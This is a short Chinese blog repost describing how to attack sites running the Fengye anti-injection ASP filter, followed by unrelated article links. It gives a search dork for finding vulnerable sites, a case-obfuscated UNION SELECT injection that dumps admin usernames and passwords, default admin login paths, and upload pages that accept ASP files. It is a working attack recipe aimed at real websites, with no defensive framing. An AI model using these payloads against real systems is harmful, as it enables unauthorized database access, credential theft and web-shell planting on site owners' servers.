枫叶防注入程序漏洞-白红宇

枫叶防注入程序漏洞

阅读量：5837 次

发布时间：2019-06-18

本文共 462 字，大约阅读时间需要 1 分钟。

关键字：inurl:pro_show.asp?showid=

该程序采用枫叶通用防注入1.0asp版，此防注入完全鸡肋，该类型网站程序pro_show.asp

有cookies注入或者变型注入，注入前可以先判断一下字段数：ORdeR By xx

注入语句：ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25，26，27，28 FrOm lei_admin

字段数看个人判断的为准

密码为明文和明文都有，默认后台地址：admin/index/login.asp（也有修改的）

后台上传地址：admin/inc/upfile.htm 可直接上传asp文件

上传路径admin/upimg/

有些后台有双文件上传漏洞：admin/inc/upfiletwo.asp

有些后台还有eweb编辑器

转载于:https://blog.51cto.com/tar0cissp/1269470

你可能感兴趣的文章

百度账号注销

查看>>

mysql-This version of MySQL doesn’t yet support ‘LIMIT & IN/ALL/ANY/SOME 错误解决

查看>>

BIEE Demo（RPD创建 + 分析 +仪表盘 )

查看>>

Cocos2dx 3.0开发环境的搭建--Eclipse建立在Android工程

查看>>

基本概念复习

查看>>

重构第10天：提取方法(Extract Method)

查看>>

Android Fragment使用(四) Toolbar使用及Fragment中的Toolbar处理

查看>>

MySQL出现Access denied for user ‘root’@’localhost’ (using password:YES)

查看>>

通过Roslyn构建自己的C#脚本（更新版）（转）

WindowManager.LayoutParams 详解

asp.net怎样在URL中使用中文、空格、特殊字符